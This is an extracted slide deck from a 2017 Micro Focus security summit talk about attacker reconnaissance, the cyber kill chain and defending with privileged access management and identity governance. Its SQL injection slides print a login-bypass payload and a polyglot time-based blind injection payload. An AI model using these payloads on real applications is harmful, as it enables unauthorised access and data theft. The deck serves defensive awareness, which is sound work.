Upload
micro-focus
View
3.023
Download
0
Embed Size (px)
Citation preview
Jean-Paul Garcia-Moran
Security Architect
March 2017
Protect and survive—safeguarding
your information assets
#MFSummit2017
What is the feeling out there on security?
44% 71% 51%
PwC Global Economic Crime survey 2016
Of UK respondents
who experienced
cybercrime, up
from 24% in 2014
Of respondents felt
the risk of
cybercrime had
increased over the
last 2 years
Sinking
expectations from
people, this is
number of
respondents that
felt that they would
probably get
hacked in the next
two years.
1
2
3
4
5
6
7
Cyber Kill Chain
Reco
nn
ais
san
ce
Deliv
ery
Insta
llatio
n
Actio
ns o
n
Ob
jectiv
es
Weap
on
isati
on
Exp
loit
ati
on
Co
mm
an
d &
Co
ntr
ol
(C2)
Information Gathering on ServicesConnectivity
Data Repositories
File Sharing
Internet Facing Devices
• Tools for network scanning
• Query public DNS databases for info on IP’s
• Enumerate services and vulnerabilities
Active Reconnaissance
• Specialized Search Engines provide an advantage of
relative anonymity when researching targets
• Public repositories such as GitHub can be searched for
users mistakingly publishing passwords and application
code. (If there is one guarantee is that users make
mistakes!)
Passive Reconnaissance
• Many public databases to share Google Dorks
• Look for login UI’s
• Shared documents in public clouds
• Web server information
• Application Errors (SQLi attack vector)
• Most of the time, it’s an attack of opportunity
• Automation is possible with advanced payload techniques
• Common targets are PHP and MySQL applications
How to perform SQLi
Login
‘ OR 1=1;/*
/* --
SELECT * FROM ‘users’ WHERE
‘username’ = ‘’ OR 1=1; /* AND
‘password’ = ‘*/ --’
Unauthorized access is granted to
the application
SELECT * FROM some_table WHERE double_quotes =
"[Injection point]“
Advanced SQLi Payloads
"IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,
SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@
@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC
71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)
<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEE
P(1)))OR"*/"
• Look for passwords hardcoded in scripts
• Look for private keys mistakenly published
• Look for juicy info inside log files and scripts
GitRob
• Search for devices with weak or no security
• Search for devices within a particular IP bloc to
investigate a target
• Search for particular type of $erver
Stealthy ExploitationThese meatbags see me as a trusted process, little do they suspect that I am actually an advanced hacker tool written in powershell. I am capable of stealthily staging a breach!
These puny humans think their secrets are safe! But I
with my advanced memory manipulation techniques will recover all your passwords and kerberos tickets! They will never know what hit them! HA HA HA!!
• Passwords are sometimes hardcoded in Group Policies
for configuration or update purposes
• They can be found in scripts used for maintenance of
systems
• Many users hold privileged accounts and it’s easier to
attack them
• Phishing campaigns are very effective at compromising
the users
Privileged Access Management
Policy engine does the
following:
1) Evaluates rules
2) If user is allowed,
obtains privileged
credentials
3) Starts a privileged
session with protected
system
4) Connects users to
privileged session
Policy Engine
Credential Vault
Bastion Server Firewall
User: admin
User: root
Access
Policy
Manageme
nt
Super User
Privilege
Mgmt
(SUPM)
Shared
Account
Password
Manaement
(SAPM)
Real-time
Activity
Monitoring
Privileged Access Management
Enterprise
Credential Vault
Identity Vault
Managed Applications
Identity Vault
Driver Sync
• Sysadmins
• External consultants
• DBA’s
• Developers
• Helpdesk
Leverage good governanceDatabases Operating Systems Network Devices
Sharepoint RACF SAP LDAP
Privileged
Access
Request
Privileged
Identity
Governance
Time Based
Provisioning
Authorization
Workflows
Identity Governance and Administration
Could it have been prevented?
Identity Governance
Multi-Factor Authentication
Change Management
Risk Based Authentication
SIEM Monitoring and
Anomaly Detection
Privileged Account Management
H4ck3R
• http://wiki.ipfire.org/en/configuration/firewall/blockshodan
• Move to lowest privilege model
• Manage those passwords
• Enable the users to improve their own security
Recommendations
• Identify threat sources and actors and follow-up on them
(obsessively!!)
• Determine likely targets for these actors
• Manage the vulnerabilities
• Simulate attacks to test how effective the organization is
at detecting and remediating
• Learn, improve and repeat.
Recommendations